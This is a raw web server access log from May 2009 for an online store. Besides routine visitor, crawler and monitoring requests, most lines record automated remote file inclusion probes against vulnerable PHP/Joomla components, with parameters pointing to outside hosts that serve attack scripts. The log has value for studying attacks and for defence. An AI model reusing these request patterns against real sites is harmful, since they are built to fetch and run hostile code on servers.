75.22.73.43 - - [16/May/2009:02:07:59 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:02:07:59 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:02:07:59 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:02:07:59 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:02:08:04 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:02:08:14 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L009FCC4317E1E100CD6C00U+M37+ENG HTTP/1.1" 200 47230 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:02:08:16 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L009FCC4317E1E100CD6C00U+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:02:08:16 -0400] "GET /images/items/88330009_THUMB.JPG HTTP/1.1" 200 1723 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L009FCC4317E1E100CD6C00U+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:02:08:16 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L009FCC4317E1E100CD6C00U+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
217.147.29.190 - - [16/May/2009:02:08:19 -0400] "GET /logs/access_log.Q109020600%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:02:08:20 -0400] "GET /logs/access_log.Q108082400%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:08:28 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:08:28 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:08:28 -0400] "GET /logs/access_log.Q108061100//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:08:28 -0400] "GET /logs/access_log.Q108080200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:08:30 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:08:30 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:08:30 -0400] "GET /logs/access_log.Q108061100%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:08:30 -0400] "GET /logs/access_log.Q108080200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:08:32 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:08:32 -0400] "GET /logs/access_log.Q108080200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:08:32 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:08:32 -0400] "GET /logs/access_log.Q108061100//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:08:40 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:08:40 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:08:40 -0400] "GET /logs/error_log.Q108080100%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:08:40 -0400] "GET /logs/error_log.Q108092900%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
88.84.128.40 - - [16/May/2009:02:08:48 -0400] "GET /logs/access_log.Q108090800//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
209.151.224.238 - - [16/May/2009:02:09:33 -0400] "GET /logs/access_log.Q108090400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.fitnessconcept.at/shop/images/bla.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.820"
209.151.224.238 - - [16/May/2009:02:09:33 -0400] "GET /logs/access_log.Q109050800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.fitnessconcept.at/shop/images/bla.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.820"
72.52.230.168 - - [16/May/2009:02:09:34 -0400] "GET /logs/access_log.Q108090200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:02:10:32 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:02:10:32 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:02:10:32 -0400] "GET /logs/access_log.Q108090200//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:02:10:36 -0400] "GET /logs/access_log.Q108101000//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
87.106.135.14 - - [16/May/2009:02:10:38 -0400] "GET /logs/error_log.Q108102900//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
72.30.79.49 - - [16/May/2009:02:10:52 -0400] "GET /logs/error_log.Q108031600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.172.92.14 - - [16/May/2009:02:10:53 -0400] "GET /logs/error_log.Q108102900//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
217.18.76.16 - - [16/May/2009:02:11:03 -0400] "GET /logs/access_log.Q108100900//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:02:11:03 -0400] "GET //components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:02:11:03 -0400] "GET /logs//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
72.30.79.49 - - [16/May/2009:02:11:04 -0400] "GET /logs/error_log.Q108071600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.120.237.150 - - [16/May/2009:02:11:21 -0400] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gitchigaming.com/images/banners/.qwerty01?? HTTP/1.1" 200 409 "-" "libwww-perl/5.811"
216.120.237.150 - - [16/May/2009:02:11:21 -0400] "GET /logs/access_log.Q109030500/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gitchigaming.com/images/banners/.qwerty01?? HTTP/1.1" 404 225 "-" "libwww-perl/5.811"
216.120.237.150 - - [16/May/2009:02:11:21 -0400] "GET /logs/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gitchigaming.com/images/banners/.qwerty01?? HTTP/1.1" 200 1552 "-" "libwww-perl/5.811"
209.59.12.99 - - [16/May/2009:02:11:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.18.76.16 - - [16/May/2009:02:11:26 -0400] "GET /logs/access_log.Q109011600//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
163.20.116.193 - - [16/May/2009:02:11:47 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 279 "-" "libwww-perl/5.800"
163.20.116.193 - - [16/May/2009:02:11:48 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 252 "-" "libwww-perl/5.800"
163.20.116.193 - - [16/May/2009:02:11:48 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.800"
163.20.116.193 - - [16/May/2009:02:11:55 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 279 "-" "libwww-perl/5.800"
217.18.76.16 - - [16/May/2009:02:12:31 -0400] "GET /logs/access_log.Q108100600//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
190.144.44.36 - - [16/May/2009:02:12:59 -0400] "GET /logs/access_log.Q108112400//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:02:13:07 -0400] "GET /logs/access_log.Q108090200%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:02:13:07 -0400] "GET /logs/access_log.Q108101000%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
70.85.249.226 - - [16/May/2009:02:13:12 -0400] "GET /logs/access_log.Q108082000//?sIncPath=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:13:43 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:13:43 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:13:43 -0400] "GET /logs/access_log.Q108081500%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:14:06 -0400] "GET /logs/access_log.Q108081000%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.18.76.16 - - [16/May/2009:02:14:11 -0400] "GET /logs/access_log.Q108090200//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
69.172.92.14 - - [16/May/2009:02:15:23 -0400] "GET /logs/access_log.Q109011600//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
87.106.135.14 - - [16/May/2009:02:15:29 -0400] "GET /logs/access_log.Q109011600//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
66.249.72.114 - - [16/May/2009:02:16:01 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L6074E03D2B7896003EE901C+WSEQ(S0060):1+OUITEM(A0200):04948502 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.52.230.168 - - [16/May/2009:02:16:07 -0400] "GET /logs/access_log.Q108100600//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:16:11 -0400] "GET /logs/access_log.Q108090100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:02:16:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.166.211.194 - - [16/May/2009:02:16:59 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.fitnessconcept.at/shop/images/bla.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
210.166.211.194 - - [16/May/2009:02:16:59 -0400] "GET /logs/access_log.Q108090400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.fitnessconcept.at/shop/images/bla.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
210.166.211.194 - - [16/May/2009:02:17:00 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.fitnessconcept.at/shop/images/bla.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
210.166.211.194 - - [16/May/2009:02:17:15 -0400] "GET /logs/access_log.Q109050800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.fitnessconcept.at/shop/images/bla.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
217.18.76.16 - - [16/May/2009:02:17:19 -0400] "GET /logs/access_log.Q108091400//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:02:17:19 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:02:17:20 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
69.172.92.14 - - [16/May/2009:02:17:23 -0400] "GET /logs/access_log.Q108100600//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
87.106.135.14 - - [16/May/2009:02:17:42 -0400] "GET /logs/access_log.Q108100600//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:02:17:49 -0400] "GET /logs/access_log.Q108082500//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
66.232.102.70 - - [16/May/2009:02:18:13 -0400] "GET //?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:02:18:13 -0400] "GET /logs/access_log.Q108100900//?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:02:18:13 -0400] "GET /logs//?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
88.84.128.40 - - [16/May/2009:02:18:40 -0400] "GET /logs/error_log.Q108102900//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
194.181.2.29 - - [16/May/2009:02:19:08 -0400] "GET /logs/access_log.Q108090400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.masuccessguy.com//docs/pifsystem???? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
194.181.2.29 - - [16/May/2009:02:19:09 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.masuccessguy.com//docs/pifsystem???? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
194.181.2.29 - - [16/May/2009:02:19:09 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.masuccessguy.com//docs/pifsystem???? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:02:19:39 -0400] "GET /logs/access_log.Q109040700//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
194.181.2.29 - - [16/May/2009:02:19:40 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.masuccessguy.com//docs/system.doc?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
194.181.2.29 - - [16/May/2009:02:19:40 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.masuccessguy.com//docs/pifsystem?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:02:19:46 -0400] "GET /logs/access_log.Q108102900//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
69.172.92.14 - - [16/May/2009:02:19:50 -0400] "GET /logs/access_log.Q109040700//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:02:19:55 -0400] "GET /logs/access_log.Q108102900//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
87.106.135.14 - - [16/May/2009:02:20:21 -0400] "GET /logs/error_log.Q109041200//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
69.172.92.14 - - [16/May/2009:02:20:32 -0400] "GET /logs/error_log.Q109041200//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
66.232.102.70 - - [16/May/2009:02:20:38 -0400] "GET /logs/access_log.Q108100900%20%20//?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.106.135.14 - - [16/May/2009:02:20:57 -0400] "GET /logs/access_log.Q109041200//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
212.150.52.114 - - [16/May/2009:02:21:09 -0400] "GET /logs/access_log.Q108090400%20%20/index.php?pg=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:02:21:09 -0400] "GET /index.php?pg=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:02:21:09 -0400] "GET /logs/index.php?pg=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
69.172.92.14 - - [16/May/2009:02:21:12 -0400] "GET /logs/access_log.Q109041200//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
122.153.212.195 - - [16/May/2009:02:21:16 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.153.212.195 - - [16/May/2009:02:21:16 -0400] "GET /logs/access_log.Q108081400%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.153.212.195 - - [16/May/2009:02:21:16 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:02:21:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.150.52.114 - - [16/May/2009:02:21:33 -0400] "GET /index.php?pg=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:02:21:33 -0400] "GET /logs/index.php?pg=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:02:21:33 -0400] "GET /logs/access_log.Q108090400%20%20/index.php?pg=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:21:35 -0400] "GET /logs/access_log.Q108090200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:02:21:41 -0400] "GET /index.php?pg=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:02:21:41 -0400] "GET /logs/index.php?pg=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:02:21:42 -0400] "GET /logs/access_log.Q108090400%20%20/index.php?pg=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
122.153.212.195 - - [16/May/2009:02:21:54 -0400] "GET /logs/access_log.Q108072900%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
212.150.52.114 - - [16/May/2009:02:22:00 -0400] "GET /index.php?pg=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
